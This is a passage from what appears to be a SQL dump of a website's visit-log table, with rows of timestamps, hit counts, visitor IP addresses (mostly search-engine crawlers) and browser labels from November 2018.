4.36.148.150','other'),(341289,1543244412,1,1,0,0,'54.36.148.201','other'),(341290,1543244469,1,1,0,0,'207.46.13.136','other'),(341291,1543244513,1,1,0,0,'54.36.148.26','other'),(341292,1543244708,1,1,0,0,'46.229.168.137','other'),(341293,1543244710,1,1,0,0,'46.229.168.135','other'),(341294,1543245073,2,2,0,0,'178.154.200.48','other'),(341295,1543245092,1,1,0,0,'178.154.244.11','other'),(341296,1543245132,3,3,0,0,'178.154.244.29','other'),(341297,1543245236,4,4,0,0,'40.77.167.175','other'),(341298,1543245239,1,1,0,0,'37.9.113.103','other'),(341299,1543245377,2,2,0,0,'141.8.142.103','other'),(341300,1543245387,2,2,0,0,'66.249.66.156','chrome'),(341301,1543245534,2,2,0,0,'91.196.178.77','firefox'),(341302,1543245815,3,3,0,0,'207.46.13.101','other'),(341303,1543245882,2,2,0,0,'207.46.13.136','other'),(341304,1543245946,1,1,0,0,'54.36.149.48','other'),(341305,1543246099,2,2,0,0,'157.55.39.252','other'),(341306,1543246152,1,1,0,0,'66.249.66.42','chrome'),(341307,1543246186,1,1,0,0,'66.249.66.152','chrome'),(341308,1543246257,3,3,0,0,'40.77.167.175','other'),(341309,1543246432,1,1,0,0,'54.36.148.187','other'),(341310,1543246507,1,1,0,0,'95.163.255.196','other'),(341311,1543246509,1,1,0,0,'95.163.255.178','other'),(341312,1543246656,1,1,0,0,'46.229.168.146','other'),(341313,1543246911,1,1,0,0,'54.36.148.229','other'),(341314,1543246958,1,1,0,0,'95.163.255.193','other'),(341315,1543246961,1,1,0,0,'95.163.255.169','other'),(341316,1543247030,1,1,0,0,'157.55.39.252','other'),(341317,1543247036,2,2,0,0,'207.46.13.136','other'),(341318,1543247114,2,2,0,0,'207.46.13.101','other'),(341319,1543247733,1,1,0,0,'54.36.148.97','other'),(341320,1543247859,1,1,0,0,'54.36.148.59','other'),(341321,1543248140,4,4,0,0,'40.77.167.175','other'),(341322,1543248252,1,1,0,0,'46.229.168.143','other'),(341323,1543248254,1,1,0,0,'46.229.168.130','other'),(341324,1543248492,2,2,0,0,'207.46.13.101','other'),(341325,1543248674,1,1,0,0,'95.163.255.66','other'),(341326,1543248676,1,1,0,0,'95.163.255.69','other'),(341327,1543248858,2,2,0,0,'46.229.168.149','other'),(341328,1543249290,2,2,0,0,'157.55.39.252','other'),(341329,1543250157,1,1,0,0,'54.36.149.77','other'),(341330,1543250277,4,4,0,0,'157.55.39.252','other'),(341331,1543250283,2,2,0,0,'40.77.167.175','other'),(341332,1543250431,1,0,1,0,'66.249.66.157',''),(341333,1543250433,1,0,1,0,'66.249.66.156',''),(341334,1543250655,1,0,1,0,'66.249.66.61',''),(341335,1543250656,1,0,1,0,'66.249.66.42',''),(341336,1543250691,1,1,0,0,'95.132.32.143','other'),(341337,1543250763,1,1,0,0,'95.163.255.96','other'),(341338,1543250765,2,2,0,0,'46.211.123.17','chrome'),(341339,1543250768,1,1,0,0,'95.163.255.93','other'),(341340,1543250770,1,1,0,0,'95.163.255.116','other'),(341341,1543250778,1,1,0,0,'95.163.255.114','other'),(341342,1543250786,1,1,0,0,'95.163.255.112','other'),(341343,1543250795,1,1,0,0,'95.163.255.102','other'),(341344,1543250902,1,1,0,0,'54.36.148.115','other'),(341345,1543250949,3,3,0,0,'207.46.13.136','other'),(341346,1543251017,3,3,0,0,'207.46.13.101','other'),(341348,1543251019,1,1,0,0,'178.154.244.29','other'),(341349,1543251287,1,1,0,0,'95.163.255.170','other'),(341350,1543251302,6,6,0,0,'178.154.244.11','other'),(341351,1543251306,3,3,0,0,'5.45.207.79','other'),(341352,1543251536,1,1,0,0,'95.163.255.155','other'),(341353,1543251537,1,1,0,0,'95.163.255.190','other'),(341354,1543251631,6,6,0,0,'157.55.39.252','other'),(341355,1543251655,1,1,0,0,'95.163.255.193','other'),(341356,1543251658,1,1,0,0,'95.163.255.175','other'),(341357,1543251675,2,2,0,0,'5.45.207.19','other'),(341358,1543251772,2,2,0,0,'46.211.123.17','chrome'),(341359,1543252152,2,2,0,0,'178.154.244.29','other'),(341360,1543252195,1,1,0,0,'141.8.142.103','other'),(341361,1543252433,2,2,0,0,'178.154.244.11','other'),(341362,1543252613,3,3,0,0,'40.77.167.175','other'),(341363,1543252758,1,1,0,0,'54.36.149.4','other'),(341364,1543252930,1,1,0,0,'157.55.39.252','other'),(341365,1543253280,1,1,0,0,'8.29.198.26','other'),(341366,1543253342,1,1,0,0,'46.229.168.145','other'),(341367,1543253487,1,1,0,0,'46.229.168.129','other'),(341368,1543253489,1,1,0,0,'46.229.168.149','other'),(341369,1543253537,1,1,0,0,'46.229.168.144','other'),(341370,1543253608,6,6,0,0,'40.77.167.175','other'),(341371,1543253769,3,3,0,0,'207.46.13.101','other'),(341372,1543253805,1,1,0,0,'54.36.149.36','other'),(341373,1543254159,1,1,0,0,'46.37.82.240','other'),(341374,1543254197,1,1,0,0,'95.132.32.143','other'),(341375,1543254459,1,1,0,0,'54.36.148.58','other'),(341376,1543254530,1,1,0,0,'54.36.149.81','other'),(341377,1543254763,1,1,0,0,'54.36.148.142','other'),(341378,1543254815,2,2,0,0,'207.46.13.136','other'),(341379,1543254928,1,1,0,0,'54.36.148.116','other'),(341380,1543254989,2,2,0,0,'8.29.198.25','other'),(341381,1543255486,1,1,0,0,'54.36.148.124','other'),(341382,1543255670,3,3,0,0,'157.55.39.252','other'),(341383,1543255701,1,1,0,0,'54.36.148.226','other'),(341384,1543255743,1,1,0,0,'54.36.148.232','other'),(341385,1543255860,1,1,0,0,'207.46.13.136','other'),(341386,1543255917,2,2,0,0,'40.77.167.175','other'),(341387,1543256387,1,1,0,0,'54.36.148.92','other'),(341388,1543256569,1,1,0,0,'54.36.149.65','other'),(341389,1543256822,1,1,0,0,'54.36.148.176','other'),(341390,1543256898,3,3,0,0,'207.46.13.101','other'),(341391,1543256978,5,5,0,0,'207.46.13.136','other'),(341392,1543257142,4,4,0,0,'157.55.39.252','other'),(341393,1543257191,1,1,0,0,'54.36.148.241','other'),(341394,1543257315,1,1,0,0,'54.36.148.101','other'),(341395,1543257579,4,4,0,0,'40.77.167.175','other'),(341396,1543257940,1,1,0,0,'54.36.148.13','other'),(341397,1543258234,3,3,0,0,'157.55.39.252','other'),(341398,1543258236,4,4,0,0,'207.46.13.101','other'),(341399,1543258303,1,1,0,0,'54.36.149.61','other'),(341400,1543258642,1,1,0,0,'54.36.148.110','other'),(341401,1543258648,1,1,0,0,'207.46.13.136','other'),(341402,1543258742,1,1,0,0,'46.229.168.140','other'),(341403,1543258839,2,2,0,0,'208.97.140.218','chrome'),(341404,1543259367,1,1,0,0,'54.36.148.201','other'),(341405,1543259574,1,1,0,0,'46.166.186.199','other'),(341406,1543259580,1,1,0,0,'109.201.154.211','other'),(341407,1543259683,4,4,0,0,'207.46.13.101','other'),(341408,1543259917,4,4,0,0,'82.145.210.35','other'),(341409,1543260116,4,4,0,0,'40.77.167.175','other'),(341410,1543260175,1,1,0,0,'46.229.168.129','other'),(341411,1543260176,1,1,0,0,'46.229.168.135','other'),(341412,1543260448,7,7,0,0,'178.154.244.11','other'),(341413,1543260452,8,8,0,0,'178.154.244.29','other'),(341414,1543260665,6,6,0,0,'207.46.13.136','other'),(341415,1543260786,1,1,0,0,'5.45.207.79','other'),(341416,1543261098,2,2,0,0,'207.46.13.101','other'),(341417,1543261108,1,1,0,0,'46.229.168.142','other'),(341418,1543261345,1,1,0,0,'46.229.168.130','other'),(341419,1543261578,1,1,0,0,'5.45.207.19','other'),(341420,1543261682,5,5,0,0,'157.55.39.252','other'),(341421,1543261893,1,1,0,0,'91.196.178.37','chrome'),(341422,1543262063,1,1,0,0,'54.36.148.130','other'),(341423,1543262221,6,6,0,0,'40.77.167.175','other'),(341424,1543262434,1,1,0,0,'95.163.255.119','other'),(341425,1543262441,1,1,0,0,'95.163.255.109','other'),(341426,1543262483,4,4,0,0,'207.46.13.101','other'),(341427,1543262628,1,1,0,0,'178.154.244.11','other'),(341428,1543262738,1,1,0,0,'157.55.39.252','other'),(341429,1543262779,1,1,0,0,'91.196.178.133','chrome'),(341430,1543262871,2,2,0,0,'95.163.255.159','other'),(341431,1543263058,1,1,0,0,'54.36.148.98','other'),(341432,1543263192,1,1,0,0,'54.36.148.218','other'),(341433,1543263239,3,3,0,0,'207.46.13.136','other'),(341434,1543263525,1,1,0,0,'54.36.148.182','other'),(341435,1543263644,1,1,0,0,'46.229.168.142','other'),(341436,1543264130,1,1,0,0,'8.29.198.27','other'),(341437,1543264135,1,1,0,0,'54.36.149.53','other'),(341438,1543264235,6,6,0,0,'207.46.13.101','other'),(341439,1543264361,1,1,0,0,'54.36.148.100','other'),(341440,1543264387,1,1,0,0,'66.249.66.40','chrome'),(341441,1543264562,1,1,0,0,'157.55.39.252','other'),(341442,1543264935,4,4,0,0,'40.77.167.175','other'),(341443,1543265143,2,2,0,0,'207.46.13.101','other'),(341444,1543265518,5,5,0,0,'207.46.13.136','other'),(341445,1543265589,1,1,0,0,'46.229.168.134','other'),(341446,1543265598,1,1,0,0,'46.229.168.144','other'),(341447,1543265651,1,1,0,0,'54.36.148.20','other'),(341448,1543265836,1,1,0,0,'8.29.198.27','other'),(341449,1543265961,1,1,0,0,'54.36.148.102','other'),(341450,1543265972,1,1,0,0,'46.229.168.148','other'),(341451,1543266277,3,3,0,0,'40.77.167.175','other'),(341452,1543266443,1,1,0,0,'8.29.198.25','other'),(341453,1543266586,1,1,0,0,'54.36.148.108','other'),(341454,1543266735,1,1,0,0,'207.46.13.136','other'),(341455,1543267036,5,5,0,0,'207.46.13.101','other'),(341456,1543267140,2,2,0,0,'95.163.255.93','other'),(341457,1543267142,1,1,0,0,'95.163.255.97','other'),(341458,1543267529,1,1,0,0,'46.229.168.130','other'),(341459,1543267634,1,1,0,0,'141.8.142.162','other'),(341460,1543267655,1,1,0,0,'54.36.148.54','other'),(341461,1543267678,1,1,0,0,'66.249.66.152','chrome'),(341462,1543267842,1,1,0,0,'95.163.255.92','other'),(341463,1543267851,4,4,0,0,'40.77.167.175','other'),(341464,1543267948,1,1,0,0,'95.163.255.95','other'),(341465,1543267949,1,1,0,0,'95.163.255.98','other'),(341466,1543268020,2,2,0,0,'157.55.39.252','other'),(341467,1543268045,1,1,0,0,'95.163.255.154','other'),(341468,1543268048,1,1,0,0,'95.163.255.189','other'),(341469,1543268584,1,1,0,0,'54.36.148.204','other'),(341470,1543268630,4,4,0,0,'207.46.13.136','other'),(341471,1543268638,1,1,0,0,'54.36.148.228','other'),(341472,1543269116,1,1,0,0,'54.36.148.221','other'),(341473,1543269133,2,2,0,0,'91.209.11.236','other'),(341474,1543269230,1,1,0,0,'95.108.181.57','other'),(341476,1543269231,1,1,0,0,'178.154.244.29','other'),(341477,1543269234,1,1,0,0,'37.9.113.148','other'),(341478,1543269323,1,1,0,0,'66.249.66.156','chrome'),(341479,1543269324,1,1,0,0,'66.249.66.154','chrome'),(341480,1543269652,1,1,0,0,'87.250.224.99','other'),(341481,1543269904,3,3,0,0,'207.46.13.136','other'),(341482,1543269970,1,1,0,0,'54.36.149.67','other'),(341483,1543270024,1,1,0,0,'54.36.149.96','other'),(341484,1543270183,1,1,0,0,'54.36.148.95','other'),(341485,1543270458,1,1,0,0,'178.154.200.48','other'),(341486,1543270463,1,1,0,0,'141.8.183.23','other'),(341487,1543270576,3,3,0,0,'173.212.233.72','chrome'),(341488,1543270662,2,2,0,0,'37.9.113.20','other'),(341489,1543270679,1,1,0,0,'87.250.224.64','other'),(341490,1543270691,1,1,0,0,'54.36.148.60','other'),(341491,1543270692,4,4,0,0,'207.46.13.101','other'),(341492,1543270771,2,2,0,0,'95.108.181.57','other'),(341493,1543270773,1,1,0,0,'178.154.171.69','other'),(341494,1543270927,1,1,0,0,'141.8.142.81','other'),(341495,1543270955,1,1,0,0,'87.250.224.47','other'),(341496,1543270965,1,1,0,0,'178.154.171.24','other'),(341497,1543270999,1,1,0,0,'178.154.244.65','other'),(341498,1543271020,2,2,0,0,'40.77.167.175','other'),(341499,1543271048,1,1,0,0,'213.180.203.40','other'),(341500,1543271061,1,1,0,0,'5.255.253.22','other'),(341501,1543271087,2,2,0,0,'207.46.13.136','other'),(341502,1543271176,1,1,0,0,'141.8.142.103','other'),(341503,1543271180,1,1,0,0,'37.9.113.103','other'),(341504,1543271186,2,2,0,0,'213.180.203.9','other'),(341505,1543271747,1,1,0,0,'54.36.148.180','other'),(341506,1543272034,1,1,0,0,'54.36.148.59','other'),(341507,1543272070,1,1,0,0,'54.36.148.24','other'),(341508,1543272230,1,1,0,0,'141.8.142.81','other'),(341509,1543272254,1,1,0,0,'66.249.66.155','chrome'),(341510,1543272255,1,1,0,0,'66.249.66.152','chrome'),(341511,1543272452,4,4,0,0,'40.77.167.175','other'),(341512,1543272526,1,1,0,0,'5.255.253.22','other'),(341513,1543272703,1,1,0,0,'54.36.149.68','other'),(341514,1543272846,1,1,0,0,'54.36.148.255','other'),(341515,1543273019,1,1,0,0,'54.36.148.129','other'),(341516,1543273069,1,1,0,0,'54.36.148.25','other'),(341517,1543273205,1,1,0,0,'54.36.148.180','other'),(341518,1543273452,5,5,0,0,'207.46.13.136','other'),(341519,1543273495,2,2,0,0,'40.77.167.175','other'),(341520,1543273885,2,2,0,0,'157.55.39.252','other'),(341521,1543274076,1,1,0,0,'54.36.148.169','other'),(341522,1543274164,1,1,0,0,'54.36.148.47','other'),(341523,1543274219,1,1,0,0,'188.163.32.129','other'),(341524,1543274392,1,1,0,0,'46.229.168.153','other'),(341525,1543274396,2,2,0,0,'46.229.168.140','other'),(341526,1543274418,2,2,0,0,'207.46.13.136','other'),(341527,1543274548,1,1,0,0,'46.229.168.141','other'),(341528,1543274695,1,1,0,0,'46.229.168.134','other'),(341529,1543274979,1,1,0,0,'8.29.198.25','other'),(341530,1543275046,1,1,0,0,'54.36.148.177','other'),(341531,1543275606,2,2,0,0,'40.77.167.175','other'),(341532,1543275610,2,2,0,0,'207.46.13.136','other'),(341533,1543275747,1,1,0,0,'54.36.148.38','other'),(341534,1543275933,1,1,0,0,'180.76.15.19','other'),(341535,1543275934,1,1,0,0,'180.76.15.138','other'),(341536,1543276137,1,1,0,0,'54.36.148.18','other'),(341537,1543276265,1,1,0,0,'54.36.148.184','other'),(341538,1543276684,2,2,0,0,'8.29.198.26','other'),(341539,1543276983,2,2,0,0,'157.55.39.252','other'),(341540,1543277124,5,5,0,0,'207.46.13.101','other'),(341541,1543277471,1,1,0,0,'46.229.168.136','other'),(341542,1543277530,1,1,0,0,'54.165.59.7','other'),(341543,1543277955,1,1,0,0,'46.229.168.145','other'),(341544,1543277959,1,1,0,0,'46.229.168.149','other'),(341545,1543278000,3,3,0,0,'40.77.167.175','other'),(341546,1543278002,2,2,0,0,'46.229.168.153','other'),(341547,1543278100,1,1,0,0,'54.36.148.37','other'),(341548,1543278711,4,4,0,0,'207.46.13.101','other'),(341549,1543278722,1,1,0,0,'157.55.39.252','other'),(341550,1543279061,1,1,0,0,'178.154.244.11','other'),(341551,1543279168,2,2,0,0,'178.154.244.49','other'),(341552,1543279231,206,206,0,0,'144.76.176.171','other'),(341553,1543279233,1,1,0,0,'213.180.203.40','other'),(341554,1543279239,1,1,0,0,'5.255.253.38','other'),(341555,1543279280,1,1,0,0,'87.250.224.64','other'),(341556,1543279288,3,3,0,0,'207.46.13.136','other'),(341557,1543279392,1,1,0,0,'5.45.207.79','other'),(341558,1543279395,1,1,0,0,'87.250.224.47','other'),(341559,1543279404,2,2,0,0,'213.180.203.9','other'),(341560,1543279421,1,1,0,0,'213.180.203.17','other'),(341561,1543279456,1,1,0,0,'37.9.113.20','other'),(341562,1543279473,2,2,0,0,'5.45.207.80','other'),(341563,1543279479,1,1,0,0,'178.154.171.60','other'),(341564,1543279487,1,1,0,0,'87.250.224.65','other'),(341565,1543279555,1,1,0,0,'95.108.181.75','other'),(341566,1543279585,1,1,0,0,'37.9.113.148','other'),(341567,1543279751,1,1,0,0,'178.154.200.8','other'),(341568,1543279805,1,1,0,0,'66.249.66.152','chrome'),(341569,1543280010,1,1,0,0,'46.229.168.147','other'),(341570,1543280202,2,2,0,0,'157.55.39.252','other'),(341571,1543280361,1,1,0,0,'87.250.224.99','other'),(341572,1543280417,2,2,0,0,'54.165.59.7','other'),(341573,1543280431,1,1,0,0,'46.229.168.146','other'),(341574,1543280550,1,1,0,0,'54.36.149.6','other'),(341575,1543280638,1,1,0,0,'66.249.66.44','chrome'),(341576,1543280694,1,1,0,0,'87.250.224.65','other'),(341577,1543281128,4,4,0,0,'157.55.39.252','other'),(341578,1543281186,6,6,0,0,'178.63.26.114','other'),(341579,1543281223,2,2,0,0,'40.77.167.175','other'),(341580,1543281301,4,4,0,0,'207.46.13.136','other'),(341581,1543281388,2,2,0,0,'207.46.13.101','other'),(341582,1543281393,1,1,0,0,'54.36.149.17','other'),(341583,1543281753,1,1,0,0,'54.36.149.35','other'),(341584,1543281849,1,1,0,0,'54.36.148.37','other'),(341585,1543282488,1,1,0,0,'46.229.168.137','other'),(341586,1543282627,1,1,0,0,'93.170.65.146','firefox'),(341587,1543282636,1,1,0,0,'54.36.148.128','other'),(341588,1543282731,1,1,0,0,'46.229.168.135','other'),(341589,1543282789,1,1,0,0,'54.36.148.129','other'),(341590,1543283122,6,6,0,0,'207.46.13.136','other'),(341591,1543283312,1,1,0,0,'40.77.167.175','other'),(341592,1543283464,1,1,0,0,'54.36.148.90','other'),(341593,1543283637,1,1,0,0,'54.36.148.42','other'),(341594,1543283849,1,1,0,0,'54.36.148.211','other'),(341595,1543284183,2,2,0,0,'207.46.13.136','other'),(341596,1543284277,1,1,0,0,'95.163.255.112','other'),(341597,1543284287,1,1,0,0,'95.163.255.106','other'),(341598,1543284565,1,1,0,0,'54.36.148.142','other'),(341599,1543284698,1,1,0,0,'54.165.59.7','other'),(341600,1543284938,2,2,0,0,'157.55.39.252','other'),(341601,1543285105,3,3,0,0,'207.46.13.136','other'),(341602,1543285133,1,1,0,0,'207.46.13.101','other'),(341603,1543285264,4,4,0,0,'40.77.167.175','other'),(341604,1543285837,1,1,0,0,'8.29.198.27','other'),(341605,1543285897,1,1,0,0,'178.154.244.29','other'),(341606,1543285987,1,1,0,0,'54.36.148.13','other'),(341607,1543286124,1,1,0,0,'54.165.59.7','other'),(341608,1543286952,2,2,0,0,'207.46.13.136','other'),(341609,1543287014,2,2,0,0,'207.46.13.101','other'),(341610,1543287366,6,6,0,0,'157.55.39.252','other'),(341611,1543287368,6,6,0,0,'178.154.244.11','other'),(341612,1543287432,5,5,0,0,'178.154.244.29','other'),(341613,1543287533,2,2,0,0,'8.29.198.26','other'),(341614,1543287679,1,1,0,0,'46.229.168.134','other'),(341615,1543287770,1,1,0,0,'46.229.168.144','other'),(341616,1543288066,1,1,0,0,'46.229.168.146','other'),(341617,1543288068,1,1,0,0,'46.229.168.149','other'),(341618,1543288210,1,1,0,0,'54.36.148.11','other'),(341619,1543288218,1,1,0,0,'178.154.244.65','other'),(341620,1543288412,2,2,0,0,'207.46.13.136','other'),(341621,1543288476,1,1,0,0,'46.229.168.142','other'),(341622,1543288479,1,1,0,0,'46.229.168.148','other'),(341623,1543288515,5,5,0,0,'40.77.167.175','other'),(341624,1543288699,1,1,0,0,'178.154.244.11','other'),(341625,1543288701,1,1,0,0,'5.45.207.79','other'),(341626,1543289126,1,1,0,0,'46.229.168.151','other'),(341627,1543289128,1,1,0,0,'46.229.168.132','other'),(341628,1543289366,1,1,0,0,'46.229.168.138','other'),(341629,1543289624,2,2,0,0,'54.202.15.233','chrome'),(341630,1543289816,1,1,0,0,'54.36.149.99','other'),(341631,1543289845,1,1,0,0,'46.229.168.135','other'),(341632,1543290102,50,50,0,0,'178.63.82.50','other'),(341633,1543290211,2,2,0,0,'40.77.167.175','other'),(341634,1543290330,1,1,0,0,'54.36.149.44','other'),(341635,1543290702,2,2,0,0,'207.46.13.101','other'),(341636,1543290746,1,1,0,0,'66.249.66.59','chrome'),(341638,1543291277,1,1,0,0,'54.36.148.216','other'),(341639,1543291284,3,3,0,0,'40.77.167.175','other'),(341640,1543291415,2,2,0,0,'207.46.13.136','other'),(341641,1543291707,1,1,0,0,'54.36.148.207','other'),(341642,1543292174,1,1,0,0,'54.36.148.97','other'),(341643,1543292257,1,1,0,0,'54.36.148.38','other'),(341644,1543292288,2,2,0,0,'66.249.66.156','chrome'),(341645,1543292313,6,6,0,0,'157.55.39.252','other'),(341646,1543292489,4,4,0,0,'207.46.13.101','other'),(341647,1543292889,5,5,0,0,'40.77.167.175','other'),(341648,1543293465,4,4,0,0,'207.46.13.101','other'),(341649,1543293554,4,4,0,0,'207.46.13.136','other'),(341650,1543293917,1,1,0,0,'54.36.149.75','other'),(341651,1543293923,2,2,0,0,'157.55.39.252','other'),(341652,1543294692,2,2,0,0,'207.46.13.136','other'),(341653,1543294871,5,5,0,0,'157.55.39.252','other'),(341654,1543295128,1,1,0,0,'54.36.149.83','other'),(341655,1543295280,2,2,0,0,'40.77.167.175','other'),(341656,1543295301,1,1,0,0,'46.229.168.151','other'),(341657,1543295520,1,1,0,0,'66.249.66.155','chrome'),(341658,1543295814,1,1,0,0,'46.229.168.138','other'),(341659,1543295816,4,4,0,0,'207.46.13.136','other'),(341660,1543295834,1,1,0,0,'46.229.168.144','other'),(341661,1543295841,1,1,0,0,'46.229.168.150','other'),(341662,1543295963,2,2,0,0,'157.55.39.252','other'),(341663,1543295998,1,1,0,0,'178.133.105.111','chrome'),(341664,1543296005,2,2,0,0,'54.36.148.179','other'),(341665,1543296339,2,2,0,0,'207.46.13.101','other'),(341666,1543296340,2,2,0,0,'40.77.167.175','other'),(341667,1543296660,1,1,0,0,'54.36.149.16','other'),(341668,1543296678,1,1,0,0,'8.29.198.25','other'),(341669,1543297261,2,2,0,0,'157.55.39.252','other'),(341670,1543297287,1,1,0,0,'54.36.148.254','other'),(341671,1543297487,1,1,0,0,'46.229.168.153','other'),(341672,1543297729,1,1,0,0,'54.36.148.180','other'),(341673,1543297840,2,2,0,0,'207.46.13.101','other'),(341674,1543298196,1,1,0,0,'46.229.168.145','other'),(341675,1543298201,1,1,0,0,'46.229.168.135','other'),(341676,1543298381,2,2,0,0,'8.29.198.27','other'),(341677,1543298446,1,1,0,0,'46.229.168.134','other'),(341678,1543298451,1,1,0,0,'46.229.168.149','other'),(341679,1543298520,5,5,0,0,'40.77.167.175','other'),(341680,1543298674,4,4,0,0,'207.46.13.136','other'),(341681,1543298703,1,1,0,0,'54.36.148.238','other'),(341682,1543298837,1,1,0,0,'54.36.148.184','other'),(341683,1543299010,4,4,0,0,'207.46.13.101','other'),(341684,1543299788,1,1,0,0,'157.55.39.252','other'),(341685,1543299871,1,1,0,0,'54.36.149.1','other'),(341686,1543300415,1,1,0,0,'195.10.210.49','chrome'),(341687,1543300774,1,1,0,0,'54.36.149.25','other'),(341688,1543301097,4,4,0,0,'40.77.167.175','other'),(341689,1543301103,2,2,0,0,'157.55.39.252','other'),(341690,1543301365,1,1,0,0,'46.229.168.145','other'),(341691,1543301441,1,1,0,0,'54.36.148.196','other'),(341692,1543301473,1,1,0,0,'54.36.148.143','other'),(341693,1543301483,1,1,0,0,'46.229.168.134','other'),(341694,1543302190,2,2,0,0,'91.196.178.81','chrome'),(341695,1543302338,1,1,0,0,'54.36.148.243','other'),(341696,1543302371,2,2,0,0,'157.55.39.252','other'),(341697,1543302554,2,2,0,0,'207.46.13.101','other'),(341698,1543302628,1,1,0,0,'92.113.35.78','chrome'),(341699,1543302630,1,1,0,0,'195.10.210.49','chrome'),(341700,1543302686,1,1,0,0,'54.36.149.94','other'),(341701,1543302838,4,4,0,0,'40.77.167.175','other'),(341702,1543302988,1,1,0,0,'5.45.207.19','other'),(341703,1543303122,1,1,0,0,'178.154.244.49','other'),(341704,1543303147,1,1,0,0,'213.180.203.17','other'),(341706,1543303148,2,2,0,0,'87.250.224.64','other'),(341707,1543303154,1,1,0,0,'87.250.224.118','other'),(341708,1543303163,1,1,0,0,'37.9.113.148','other'),(341709,1543303234,1,1,0,0,'95.108.181.75','other'),(341710,1543303543,1,1,0,0,'141.8.142.108','other'),(341711,1543303555,1,1,0,0,'54.36.148.163','other'),(341712,1543303692,1,1,0,0,'178.154.171.27','other'),(341713,1543303755,1,1,0,0,'178.154.171.69','other'),(341714,1543303787,1,1,0,0,'46.229.168.146','other'),(341715,1543303850,1,1,0,0,'87.250.224.65','other'),(341716,1543303877,1,1,0,0,'5.45.207.8','other'),(341717,1543303885,1,1,0,0,'54.36.148.187','other'),(341718,1543303909,1,1,0,0,'54.36.148.16','other'),(341719,1543304029,1,1,0,0,'178.154.244.29','other'),(341720,1543304580,1,1,0,0,'54.36.149.9','other'),(341721,1543304679,4,4,0,0,'157.55.39.252','other'),(341722,1543304728,1,1,0,0,'54.36.148.72','other'),(341723,1543304749,1,1,0,0,'54.36.148.30','other'),(341724,1543304916,2,2,0,0,'40.77.167.175','other'),(341725,1543304999,1,1,0,0,'37.53.228.75','chrome'),(341726,1543305359,1,1,0,0,'46.201.241.35','firefox'),(341727,1543305360,1,1,0,0,'176.102.201.174','firefox'),(341728,1543305553,2,2,0,0,'207.46.13.136','other'),(341729,1543305611,2,2,0,0,'91.196.178.68','firefox'),(341730,1543305781,3,3,0,0,'207.46.13.101','other'),(341731,1543305986,2,2,0,0,'91.196.178.81','chrome'),(341732,1543306138,2,2,0,0,'37.55.27.95','chrome'),(341733,1543306159,1,1,0,0,'54.36.149.50','other'),(341734,1543306235,2,2,0,0,'157.55.39.252','other'),(341735,1543307151,1,1,0,0,'87.250.224.65','other'),(341736,1543307349,2,2,0,0,'157.55.39.252','other'),(341737,1543307450,1,1,0,0,'46.229.168.150','other'),(341738,1543307520,1,1,0,0,'8.29.198.25','other'),(341739,1543307939,1,1,0,0,'54.36.148.237','other'),(341740,1543307958,2,2,0,0,'207.46.13.136','other'),(341741,1543308155,1,1,0,0,'54.36.149.98','other'),(341742,1543308287,1,1,0,0,'77.111.244.4','chrome'),(341743,1543308567,1,1,0,0,'54.36.148.27','other'),(341744,1543308609,2,2,0,0,'91.196.178.81','chrome'),(341745,1543308753,2,2,0,0,'95.132.57.212','firefox'),(341746,1543308761,1,1,0,0,'54.36.148.33','other'),(341747,1543309026,2,2,0,0,'207.46.13.101','other'),(341748,1543309094,1,1,0,0,'46.37.82.240','other'),(341749,1543309229,3,3,0,0,'40.77.167.175','other'),(341750,1543309257,4,4,0,0,'207.46.13.136','other'),(341751,1543309258,2,2,0,0,'8.29.198.27','other'),(341752,1543309932,2,2,0,0,'66.249.66.156','chrome'),(341753,1543310491,1,1,0,0,'46.229.168.154','other'),(341754,1543311077,1,1,0,0,'54.36.148.237','other'),(341755,1543311310,1,1,0,0,'207.46.13.136','other'),(341756,1543311445,1,1,0,0,'54.36.148.92','other'),(341757,1543311697,1,1,0,0,'66.102.9.35','chrome'),(341759,1543311869,1,1,0,0,'54.36.148.102','other'),(341760,1543311878,1,1,0,0,'54.36.148.34','other'),(341761,1543312305,2,2,0,0,'66.249.66.157','chrome'),(341762,1543312306,2,2,0,0,'66.249.66.156','chrome'),(341763,1543312322,1,1,0,0,'92.113.72.108','chrome'),(341764,1543312766,1,1,0,0,'107.178.194.16','chrome'),(341765,1543312767,1,1,0,0,'107.178.194.21','chrome'),(341766,1543312794,1,1,0,0,'54.36.148.236','other'),(341767,1543313061,3,3,0,0,'91.196.178.68','chrome'),(341768,1543313254,1,1,0,0,'54.36.148.210','other'),(341769,1543313265,2,2,0,0,'91.196.178.81','chrome'),(341770,1543313296,1,1,0,0,'157.55.39.252','other'),(341771,1543313870,1,1,0,0,'178.154.244.11','other'),(341772,1543313908,1,1,0,0,'178.154.244.29','other'),(341773,1543314155,1,1,0,0,'141.8.183.23','other'),(341774,1543314229,1,1,0,0,'46.229.168.135','other'),(341775,1543314255,1,1,0,0,'66.249.66.59','chrome'),(341777,1543314256,1,1,0,0,'66.249.66.42','chrome'),(341778,1543314260,1,1,0,0,'54.36.149.89','other'),(341779,1543314409,1,1,0,0,'213.180.203.40','other'),(341780,1543314638,1,1,0,0,'95.67.48.138','chrome'),(341781,1543314902,1,1,0,0,'54.36.148.70','other'),(341782,1543315086,1,1,0,0,'46.229.168.142','other'),(341783,1543315090,1,1,0,0,'46.229.168.140','other'),(341784,1543315274,1,1,0,0,'54.36.148.36','other'),(341785,1543315504,1,1,0,0,'54.36.149.90','other'),(341786,1543315542,1,1,0,0,'54.36.148.144','other'),(341787,1543315741,1,1,0,0,'77.120.238.33','chrome'),(341788,1543316123,1,1,0,0,'77.88.208.52','firefox'),(341789,1543316203,1,1,0,0,'46.229.168.129','other'),(341790,1543316205,2,2,0,0,'46.229.168.130','other'),(341791,1543316301,1,1,0,0,'54.36.149.5','other'),(341792,1543316388,1,1,0,0,'46.229.168.136','other'),(341793,1543316720,1,1,0,0,'54.36.148.230','other'),(341794,1543316931,1,1,0,0,'54.36.148.43','other'),(341795,1543317059,1,1,0,0,'54.36.148.106','other'),(341796,1543317138,2,2,0,0,'91.196.178.68','firefox'),(341797,1543317617,1,1,0,0,'46.229.168.129','other'),(341798,1543318362,1,1,0,0,'8.29.198.26','other'),(341799,1543318736,1,1,0,0,'66.249.66.155','chrome'),(341800,1543318764,1,1,0,0,'66.249.66.152','chrome'),(341801,1543319268,1,1,0,0,'54.36.149.87','other'),(341802,1543319305,1,1,0,0,'54.36.148.162','other'),(341803,1543320090,2,2,0,0,'91.196.178.93','firefox'),(341804,1543320103,1,1,0,0,'66.249.66.152','chrome'),(341805,1543320105,1,1,0,0,'8.29.198.26','other'),(341806,1543320517,1,1,0,0,'54.36.149.6','other'),(341807,1543320609,1,1,0,0,'8.29.198.25','other'),(341808,